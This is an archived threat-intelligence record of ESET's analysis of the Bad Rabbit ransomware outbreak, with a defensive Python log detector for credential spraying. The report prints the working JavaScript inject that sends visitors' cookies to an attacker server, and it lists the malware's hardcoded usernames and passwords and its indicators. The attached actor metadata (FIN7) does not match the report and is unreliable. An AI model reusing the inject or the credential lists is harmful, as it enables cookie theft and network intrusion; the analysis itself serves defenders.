{
	"id": "b0e92c0f-5e7b-4551-8c8e-d511031937ea",
	"created_at": "2026-04-06T00:21:07.123829Z",
	"updated_at": "2026-04-10T03:31:13.538359Z",
	"deleted_at": null,
	"sha1_hash": "9a9047ea6d995e8197cd04b0fdc23c9608aa86c4",
	"title": "Bad Rabbit: Not-Petya is back with improved ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 571830,
	"plain_text": "Bad Rabbit: Not-Petya is back with improved ransomware\r\nBy Marc-Etienne M.Léveillé, ESET Research\r\nArchived: 2026-04-05 12:52:25 UTC\r\nA new ransomware outbreak today has hit some major infrastructure in Ukraine, including the Kiev metro. Here are some details about this new variant of Petya.\r\n24 Oct 2017, 4 min. read\r\nUPDATE (October 27 - 15:35 CEST): A new report suggested that EternalRomance, one of the leaked NSA tools, has been used to spread Diskcoder.D inside networks. We were able to confirm this by installing the out-of-life-cycle patch MS17-010 (the patch addressing the vulnerabilities misused by the leaked NSA exploits), which stopped further spread of the malware via the IPC$ share.\r\nA new ransomware outbreak today has hit some major infrastructure in Ukraine, including the Kiev metro. Here are some of the details about this new variant.\r\nDrive-by download via watering hole on popular sites\r\nOne of the distribution methods of Bad Rabbit is drive-by download. 
Some popular websites are compromised and have JavaScript injected in their HTML body or in one of their .js files.\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 1 of 9\r\nHere is a beautified version of the inject:\r\nfunction e(d) {\r\n  var xhr = null;\r\n  if (!!window.XMLHttpRequest) {\r\n    xhr = new XMLHttpRequest();\r\n  } else if (!!window.ActiveXObject) {\r\n    var xhrs = ['Microsoft.XMLHTTP', 'Msxml2.XMLHTTP', 'Msxml2.XMLHTTP.3.0', 'Msxml2.XMLHTTP.6.0'];\r\n    for (var i = 0; i \u003c xhrs.length; i++) {\r\n      try {\r\n        xhr = ActiveXObject(xhrs[i]);\r\n        break;\r\n      } catch (e) {}\r\n    }\r\n  }\r\n  if (!!xhr) {\r\n    xhr.open('POST', 'http://185.149.120\\.3/scholargoogle/');\r\n    xhr.timeout = 10000;\r\n    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');\r\n    xhr.onreadystatechange = function() {\r\n      if (xhr.readyState == 4 \u0026\u0026 xhr.status == 200) {\r\n        var resp = xhr.responseText;\r\n        if (resp) {\r\n          var fans = JSON.parse(resp);\r\n          if (fans) {\r\n            var an_s = decodeURIComponent(fans.InjectionString).replace(/\\+/g, '%20');\r\n            var da = document.createElement('div');\r\n            da.id = 'ans';\r\n            da.innerHTML = an_s;\r\n            document.body.appendChild(da);\r\n          }\r\n        }\r\n      }\r\n    };\r\n    var pd = [];\r\n    for (var k in d) {\r\n      if (d.hasOwnProperty(k)) {\r\n        pd.push(k + '=' + d[k]);\r\n      }\r\n    }\r\n    var dc = pd.join('\u0026');\r\n    xhr.send(dc);\r\n  }\r\n}\r\ne({\r\n  'agent': navigator.userAgent,\r\n  'referer': document.referrer,\r\n  'cookie': document.cookie,\r\n  'domain': window.location.hostname,\r\n  'c_state': !!document.cookie\r\n});\r\nThis script reports the following to 185.149.120[.]3, which did not respond at the time of writing:\r\nBrowser User-Agent\r\nReferrer\r\nCookie from the visited site\r\nDomain name of the visited site\r\nWhether the visited site set any cookie at all (c_state)\r\nServer-side logic can then determine whether the visitor is of interest and add content to the page (the returned InjectionString is written straight into a new div via innerHTML). 
In that case, what we have seen is that a popup asking to download an update for Flash Player is shown in the middle of the page.\r\nWhen clicking on the \"Install\" button, the download of an executable file from 1dnscontrol[.]com is initiated. This executable file, install_flash_player.exe, is the dropper for Win32/Diskcoder.D.\r\nFinally, the computer is locked and the malware shows the ransom note (screenshot in the original post).\r\nThe payment page (screenshot in the original post).\r\nSpreading via SMB\r\nWin32/Diskcoder.D has the ability to spread via SMB. As opposed to some public claims, it does not use the EternalBlue exploit the way the Win32/Diskcoder.C (Not-Petya) outbreak did (see the update above regarding EternalRomance). First, it scans internal networks for open SMB shares, probing the following share and named pipe names:\r\nadmin\r\natsvc\r\nbrowser\r\neventlog\r\nlsarpc\r\nnetlogon\r\nntsvcs\r\nspoolss\r\nsamr\r\nsrvsvc\r\nscerpc\r\nsvcctl\r\nwkssvc\r\nMimikatz is launched on the compromised computer to harvest credentials. 
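The SMB spreading stage depends on credential reuse, and it leaves a trace on every target it touches: a burst of failed network logons (Windows Security event 4625, logon type 3) from one source address, cycling through several account names within seconds, optionally followed by a successful logon (event 4624) for the account that finally worked. As an added example, not code from ESET or from the malware, the following Python detector runs that logic over a handful of constructed log lines in a simplified key=value form (the field names mirror the Security log properties; the flattened format and the addresses are assumptions for the demo) and cross-checks the flagged account names against the hardcoded username list from this post:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Username column of the hardcoded list in this post (lower-cased for matching).
BADRABBIT_USERNAMES = {
    'administrator', 'admin', 'guest', 'user', 'user1', 'user-1', 'test', 'root',
    'buh', 'boss', 'ftp', 'rdp', 'rdpuser', 'rdpadmin', 'manager', 'support',
    'work', 'other user', 'operator', 'backup', 'asus', 'ftpuser', 'ftpadmin',
    'nas', 'nasuser', 'nasadmin', 'superuser', 'netguest', 'alex',
}

# Constructed sample log: one Windows Security event per line, flattened to key=value
# pairs (an assumed export format, not a real log). 10.0.0.5 behaves like an infected
# host spraying the list against this machine; 10.0.0.9 is ordinary background noise.
SAMPLE_LOG = [
    'ts=2017-10-24T11:00:01 EventID=4625 LogonType=3 IpAddress=10.0.0.5 TargetUserName=Administrator',
    'ts=2017-10-24T11:00:02 EventID=4625 LogonType=3 IpAddress=10.0.0.5 TargetUserName=rdpadmin',
    'ts=2017-10-24T11:00:02 EventID=4625 LogonType=3 IpAddress=10.0.0.5 TargetUserName=backup',
    'ts=2017-10-24T11:00:03 EventID=4625 LogonType=3 IpAddress=10.0.0.5 TargetUserName=nasadmin',
    'ts=2017-10-24T11:00:03 EventID=4625 LogonType=3 IpAddress=10.0.0.5 TargetUserName=jsmith',
    'ts=2017-10-24T11:00:04 EventID=4624 LogonType=3 IpAddress=10.0.0.5 TargetUserName=backup',
    'ts=2017-10-24T11:05:00 EventID=4625 LogonType=2 IpAddress=10.0.0.9 TargetUserName=Administrator',
    'ts=2017-10-24T11:30:00 EventID=4625 LogonType=3 IpAddress=10.0.0.9 TargetUserName=guest',
    'ts=2017-10-24T12:30:00 EventID=4625 LogonType=3 IpAddress=10.0.0.9 TargetUserName=root',
]


def parse_event(line):
    '''Turn one key=value line into a dict; the ts field becomes a datetime.'''
    fields = {}
    for token in line.split():
        if '=' in token:
            key, value = token.split('=', 1)
            fields[key] = value
    fields['ts'] = datetime.fromisoformat(fields['ts'])
    return fields


def detect_spray(lines, window=timedelta(seconds=60), min_users=4):
    '''Map source IP -> sorted usernames for every source whose failed network logons
    (4625, logon type 3) touched at least min_users distinct accounts inside one
    sliding window. Interactive failures (other logon types) are ignored.'''
    failures = defaultdict(list)  # ip -> [(ts, username)]
    for line in lines:
        ev = parse_event(line)
        if ev.get('EventID') != '4625' or ev.get('LogonType') != '3':
            continue
        failures[ev['IpAddress']].append((ev['ts'], ev['TargetUserName'].lower()))
    hits = {}
    for ip, events in failures.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for ts, u in events[i:] if ts - start <= window}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits


def successes_after_spray(lines, hits):
    '''For each flagged source, the accounts that logged on successfully over the
    network (4624, logon type 3): the credential that let the payload be installed.'''
    result = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev.get('EventID') == '4624' and ev.get('LogonType') == '3' and ev['IpAddress'] in hits:
            result[ev['IpAddress']].append(ev['TargetUserName'].lower())
    return dict(result)


def overlap_with_wordlist(users):
    '''Which of the sprayed usernames appear in the hardcoded list from this post.'''
    return sorted(u for u in users if u in BADRABBIT_USERNAMES)


if __name__ == '__main__':
    sprays = detect_spray(SAMPLE_LOG)
    for ip, users in sprays.items():
        print(ip, 'sprayed', users)
        print('  from Bad Rabbit list:', overlap_with_wordlist(users))
    print('successful logons after spray:', successes_after_spray(SAMPLE_LOG, sprays))
```

Tune min_users and window to the host: a domain controller sees far more distinct accounts per source than a workstation does. Credentials harvested with Mimikatz need no guessing, so a single successful network logon with no preceding failures is the other pattern worth hunting for; the 4624-after-spray check above only covers the brute-force path.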
A hardcoded list of usernames and passwords is also present. The list contains the following usernames and passwords (two independent lists):\r\nUsernames: Administrator, Admin, Guest, User, User1, user-1, Test, root, buh, boss, ftp, rdp, rdpuser, rdpadmin, manager, support, work, other user, operator, backup, asus, ftpuser, ftpadmin, nas, nasuser, nasadmin, superuser, netguest, alex\r\nPasswords: Administrator, administrator, Guest, guest, User, user, Admin, adminTest, test, root, 123, 1234, 12345, 123456, 1234567, 12345678, 123456789, 1234567890, Administrator123, administrator123, Guest123, guest123, User123, user123, Admin123, admin123, Test123, test123, password, 111111, 55555, 77777, 777, qwe, qwe123, qwe321, qwer, qwert, qwerty, qwerty123, zxc, zxc123, zxc321, zxcv, uiop, 123321, 321, love, secret, sex, god\r\nWhen working credentials are found, the infpub.dat file is dropped into the Windows directory and executed through SCManager and rundll.exe.\r\nEncryption\r\nWin32/Diskcoder.D is a modified version of Win32/Diskcoder.C. Bugs in the file encryption were fixed. Disk encryption now uses DiskCryptor, legitimate open source software for full drive encryption. Keys are generated using CryptGenRandom and then protected by a hardcoded RSA-2048 public key.\r\nLike before, AES-128-CBC is used.\r\nDistribution\r\nInterestingly, ESET telemetry shows that Ukraine accounts for only 12.2% of the total number of times we have seen the dropper component. Here are the statistics:\r\nRussia: 65%\r\nUkraine: 12.2%\r\nBulgaria: 10.2%\r\nTurkey: 6.4%\r\nJapan: 3.8%\r\nOther: 2.4%\r\nThis pretty much matches the distribution of compromised websites that include the malicious JavaScript. 
So why does Ukraine seem to be hit harder than the rest?\r\nIt is interesting to note that all these big companies were hit at the same time. It is possible that the group already had a foot inside their networks and launched the watering hole attack at the same time as a decoy. Nothing says they fell for the \"Flash update\". ESET is still investigating and we will post our findings as we discover them.\r\nSamples\r\nSHA-1 | Filename | ESET detection name | Description\r\n79116fe99f2b421c52ef64097f0f39b815b20907 | infpub.dat | Win32/Diskcoder.D | Diskcoder\r\nafeee8b4acff87bc469a6f0364a81ae5d60a2add | dispci.exe | Win32/Diskcoder.D | Lockscreen\r\n413eba3973a15c1a6429d9f170f3e8287f98c21c | (not given) | Win32/RiskWare.Mimikatz.X | Mimikatz (32-bit)\r\n16605a4a29a101208457c47ebfde788487be788d | (not given) | Win64/Riskware.Mimikatz.X | Mimikatz (64-bit)\r\nde5c8d858e6e41da715dca1c019df0bfb92d32c0 | install_flash_player.exe | Win32/Diskcoder.D | Dropper\r\n4f61e154230a64902ae035434690bf2b96b4e018 | page-main.js | JS/Agent.NWC | JavaScript on compromised sites\r\nC\u0026C servers\r\nPayment site: http://caforssztxqzf2nm[.]onion\r\nInject URL: http://185.149.120[.]3/scholargoogle/\r\nDistribution URL: hxxp://1dnscontrol[.]com/flash_install.php\r\nList of compromised sites:\r\nhxxp://argumentiru[.]com\r\nhxxp://www.fontanka[.]ru\r\nhxxp://grupovo[.]bg\r\nhxxp://www.sinematurk[.]com\r\nhxxp://www.aica.co[.]jp\r\nhxxp://spbvoditel[.]ru\r\nhxxp://argumenti[.]ru\r\nhxxp://www.mediaport[.]ua\r\nhxxp://blog.fontanka[.]ru\r\nhxxp://an-crimea[.]ru\r\nhxxp://www.t.ks[.]ua\r\nhxxp://most-dnepr[.]info\r\nhxxp://osvitaportal.com[.]ua\r\nhxxp://www.otbrana[.]com\r\nhxxp://calendar.fontanka[.]ru\r\nhxxp://www.grupovo[.]bg\r\nhxxp://www.pensionhotel[.]cz\r\nhxxp://www.online812[.]ru\r\nhxxp://www.imer[.]ro\r\nhxxp://novayagazeta.spb[.]ru\r\nhxxp://i24.com[.]ua\r\nhxxp://bg.pensionhotel[.]com\r\nhxxp://ankerch-crimea[.]ru\r\n
Source: https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/"
	],
	"report_names": [
		"bad-rabbit-not-petya-back"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium",
				"Carbanak",
				"Carbon Spider",
				"FIN7",
				"Navigator",
				"Sangria Tempest",
				"TelePort Crew"
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434867,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a9047ea6d995e8197cd04b0fdc23c9608aa86c4.pdf",
		"text": "https://archive.orkl.eu/9a9047ea6d995e8197cd04b0fdc23c9608aa86c4.txt",
		"img": "https://archive.orkl.eu/9a9047ea6d995e8197cd04b0fdc23c9608aa86c4.jpg"
	}
}